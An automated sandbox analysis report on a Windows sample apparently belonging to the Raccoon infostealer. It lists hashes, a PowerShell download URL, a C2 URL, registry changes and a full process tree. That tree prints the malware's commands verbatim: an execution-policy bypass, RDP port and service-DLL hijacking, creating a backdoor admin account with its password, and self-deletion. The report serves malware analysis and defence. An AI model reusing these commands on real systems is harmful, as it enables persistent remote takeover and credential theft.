Analysis
-
max time kernel
88s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
03-06-2021 00:02
Static task
static1
Behavioral task
behavioral1
Sample
42cedc39e8da5fcd0b294e84aa406006.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
42cedc39e8da5fcd0b294e84aa406006.exe
Resource
win10v20210410
General
-
Target
42cedc39e8da5fcd0b294e84aa406006.exe
-
Size
569KB
-
MD5
42cedc39e8da5fcd0b294e84aa406006
-
SHA1
b0e221a7ba816e9d51724af40b551d72b395d62b
-
SHA256
7672dfbaa089b5f55f22e1bf1f9f985e65cc9166455c83637d3219c2c9eb4dff
-
SHA512
349415ec56ea0b294beb98b3b5aecf7ad3a02e1024563bfdc4c08cfca1950f88224c3d8456e8e21720917705ef11ea9b8a64e8a4cacc4c5fd2f93a15ccdd35f3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
e46634757936706c1ff491585768dd6fe231db30
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
flow pid Process 19 1772 powershell.exe 21 1772 powershell.exe 22 1772 powershell.exe 23 1772 powershell.exe 25 1772 powershell.exe 27 1772 powershell.exe 29 1772 powershell.exe 31 1772 powershell.exe 33 1772 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 4092 gYmsQZhOxV.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral2/files/0x0013000000000685-237.dat upx behavioral2/files/0x000c000000000687-238.dat upx -
Loads dropped DLL 8 IoCs
pid Process 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3952 42cedc39e8da5fcd0b294e84aa406006.exe 3464 Process not Found 3464 Process not Found -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
description ioc Process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
description ioc Process File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kucrxs3x.jtu.psm1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI95DD.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI960D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI963E.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_nxjxex3u.ixm.ps1 powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI961D.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI966D.tmp powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
pid Process 3956 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\file = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1772 reg.exe -
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3808 powershell.exe 3808 powershell.exe 3808 powershell.exe 3148 powershell.exe 3148 powershell.exe 3148 powershell.exe 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe 2004 powershell.exe 2004 powershell.exe 2004 powershell.exe 3808 powershell.exe 3808 powershell.exe 3808 powershell.exe 1772 powershell.exe 1772 powershell.exe 1772 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 612 Process not Found 612 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3808 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeIncreaseQuotaPrivilege 3148 powershell.exe Token: SeSecurityPrivilege 3148 powershell.exe Token: SeTakeOwnershipPrivilege 3148 powershell.exe Token: SeLoadDriverPrivilege 3148 powershell.exe Token: SeSystemProfilePrivilege 3148 powershell.exe Token: SeSystemtimePrivilege 3148 powershell.exe Token: SeProfSingleProcessPrivilege 3148 powershell.exe Token: SeIncBasePriorityPrivilege 3148 powershell.exe Token: SeCreatePagefilePrivilege 3148 powershell.exe Token: SeBackupPrivilege 3148 powershell.exe Token: SeRestorePrivilege 3148 powershell.exe Token: SeShutdownPrivilege 3148 powershell.exe Token: SeDebugPrivilege 3148 powershell.exe Token: SeSystemEnvironmentPrivilege 3148 powershell.exe Token: SeRemoteShutdownPrivilege 3148 powershell.exe Token: SeUndockPrivilege 3148 powershell.exe Token: SeManageVolumePrivilege 3148 powershell.exe Token: 33 3148 powershell.exe Token: 34 3148 powershell.exe Token: 35 3148 powershell.exe Token: 36 3148 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeIncreaseQuotaPrivilege 2248 powershell.exe Token: SeSecurityPrivilege 2248 powershell.exe Token: SeTakeOwnershipPrivilege 2248 powershell.exe Token: SeLoadDriverPrivilege 2248 powershell.exe Token: SeSystemProfilePrivilege 2248 powershell.exe Token: SeSystemtimePrivilege 2248 powershell.exe Token: SeProfSingleProcessPrivilege 2248 powershell.exe Token: SeIncBasePriorityPrivilege 2248 powershell.exe Token: SeCreatePagefilePrivilege 2248 powershell.exe Token: SeBackupPrivilege 2248 powershell.exe Token: SeRestorePrivilege 2248 powershell.exe Token: SeShutdownPrivilege 2248 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeSystemEnvironmentPrivilege 2248 powershell.exe Token: SeRemoteShutdownPrivilege 2248 powershell.exe Token: SeUndockPrivilege 2248 powershell.exe Token: SeManageVolumePrivilege 2248 powershell.exe Token: 33 2248 powershell.exe Token: 34 2248 powershell.exe Token: 35 2248 powershell.exe Token: 36 2248 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeIncreaseQuotaPrivilege 2004 powershell.exe Token: SeSecurityPrivilege 2004 powershell.exe Token: SeTakeOwnershipPrivilege 2004 powershell.exe Token: SeLoadDriverPrivilege 2004 powershell.exe Token: SeSystemProfilePrivilege 2004 powershell.exe Token: SeSystemtimePrivilege 2004 powershell.exe Token: SeProfSingleProcessPrivilege 2004 powershell.exe Token: SeIncBasePriorityPrivilege 2004 powershell.exe Token: SeCreatePagefilePrivilege 2004 powershell.exe Token: SeBackupPrivilege 2004 powershell.exe Token: SeRestorePrivilege 2004 powershell.exe Token: SeShutdownPrivilege 2004 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeSystemEnvironmentPrivilege 2004 powershell.exe Token: SeRemoteShutdownPrivilege 2004 powershell.exe Token: SeUndockPrivilege 2004 powershell.exe Token: SeManageVolumePrivilege 2004 powershell.exe Token: 33 2004 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3952 wrote to memory of 4092 3952 42cedc39e8da5fcd0b294e84aa406006.exe 78 PID 3952 wrote to memory of 4092 3952 42cedc39e8da5fcd0b294e84aa406006.exe 78 PID 3952 wrote to memory of 2720 3952 42cedc39e8da5fcd0b294e84aa406006.exe 79 PID 3952 wrote to memory of 2720 3952 42cedc39e8da5fcd0b294e84aa406006.exe 79 PID 3952 wrote to memory of 2720 3952 42cedc39e8da5fcd0b294e84aa406006.exe 79 PID 2720 wrote to memory of 3956 2720 cmd.exe 81 PID 2720 wrote to memory of 3956 2720 cmd.exe 81 PID 2720 wrote to memory of 3956 2720 cmd.exe 81 PID 4092 wrote to memory of 3808 4092 gYmsQZhOxV.exe 82 PID 4092 wrote to memory of 3808 4092 gYmsQZhOxV.exe 82 PID 3808 wrote to memory of 3508 3808 powershell.exe 84 PID 3808 wrote to memory of 3508 3808 powershell.exe 84 PID 3508 wrote to memory of 1648 3508 csc.exe 85 PID 3508 wrote to memory of 1648 3508 csc.exe 85 PID 3808 wrote to memory of 3148 3808 powershell.exe 86 PID 3808 wrote to memory of 3148 3808 powershell.exe 86 PID 3808 wrote to memory of 2248 3808 powershell.exe 89 PID 3808 wrote to memory of 2248 3808 powershell.exe 89 PID 3808 wrote to memory of 2004 3808 powershell.exe 91 PID 3808 wrote to memory of 2004 3808 powershell.exe 91 PID 3808 wrote to memory of 3260 3808 powershell.exe 93 PID 3808 wrote to memory of 3260 3808 powershell.exe 93 PID 3808 wrote to memory of 1772 3808 powershell.exe 94 PID 3808 wrote to memory of 1772 3808 powershell.exe 94 PID 3808 wrote to memory of 3144 3808 powershell.exe 95 PID 3808 wrote to memory of 3144 3808 powershell.exe 95 PID 3808 wrote to memory of 2164 3808 powershell.exe 96 PID 3808 wrote to memory of 2164 3808 powershell.exe 96 PID 2164 wrote to memory of 1240 2164 net.exe 97 PID 2164 wrote to memory of 1240 2164 net.exe 97 PID 3808 wrote to memory of 2740 3808 powershell.exe 98 PID 3808 wrote to memory of 2740 3808 powershell.exe 98 PID 2740 wrote to memory of 3208 2740 cmd.exe 99 PID 2740 wrote to memory of 3208 2740 cmd.exe 99 PID 3208 wrote to memory of 3848 3208 cmd.exe 100 PID 3208 wrote to memory of 3848 3208 cmd.exe 100 PID 3848 wrote to memory of 1128 3848 net.exe 101 PID 3848 wrote to memory of 1128 3848 net.exe 101 PID 3808 wrote to memory of 2196 3808 powershell.exe 102 PID 3808 wrote to memory of 2196 3808 powershell.exe 102 PID 2196 wrote to memory of 2828 2196 cmd.exe 103 PID 2196 wrote to memory of 2828 2196 cmd.exe 103 PID 2828 wrote to memory of 932 2828 cmd.exe 104 PID 2828 wrote to memory of 932 2828 cmd.exe 104 PID 932 wrote to memory of 2124 932 net.exe 105 PID 932 wrote to memory of 2124 932 net.exe 105 PID 3972 wrote to memory of 2248 3972 cmd.exe 109 PID 3972 wrote to memory of 2248 3972 cmd.exe 109 PID 2248 wrote to memory of 2928 2248 net.exe 110 PID 2248 wrote to memory of 2928 2248 net.exe 110 PID 3992 wrote to memory of 1812 3992 cmd.exe 113 PID 3992 wrote to memory of 1812 3992 cmd.exe 113 PID 1812 wrote to memory of 1564 1812 net.exe 114 PID 1812 wrote to memory of 1564 1812 net.exe 114 PID 3692 wrote to memory of 3956 3692 cmd.exe 117 PID 3692 wrote to memory of 3956 3692 cmd.exe 117 PID 3956 wrote to memory of 2740 3956 net.exe 118 PID 3956 wrote to memory of 2740 3956 net.exe 118 PID 1240 wrote to memory of 1832 1240 cmd.exe 121 PID 1240 wrote to memory of 1832 1240 cmd.exe 121 PID 1832 wrote to memory of 1464 1832 net.exe 122 PID 1832 wrote to memory of 1464 1832 net.exe 122 PID 2088 wrote to memory of 2352 2088 cmd.exe 125 PID 2088 wrote to memory of 2352 2088 cmd.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\42cedc39e8da5fcd0b294e84aa406006.exe"C:\Users\Admin\AppData\Local\Temp\42cedc39e8da5fcd0b294e84aa406006.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\gYmsQZhOxV.exe"C:\Users\Admin\AppData\Local\Temp\gYmsQZhOxV.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\amutdoir\amutdoir.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5C2F.tmp" "c:\Users\Admin\AppData\Local\Temp\amutdoir\CSC4AE3CED5DC0C4D95A76C66B041D5143E.TMP"5⤵PID:1648
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3148
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵PID:3260
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
PID:1772
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵PID:3144
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵PID:1240
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3208 -
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵PID:1128
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
PID:932 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵PID:2124
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵PID:2196
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵PID:3784
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\42cedc39e8da5fcd0b294e84aa406006.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:3956
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵PID:2928
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc YY6epZcX /add1⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\system32\net.exenet.exe user wgautilacc YY6epZcX /add2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc YY6epZcX /add3⤵PID:1564
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:1832 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵PID:1464
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:2352
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:3144
-
-
-
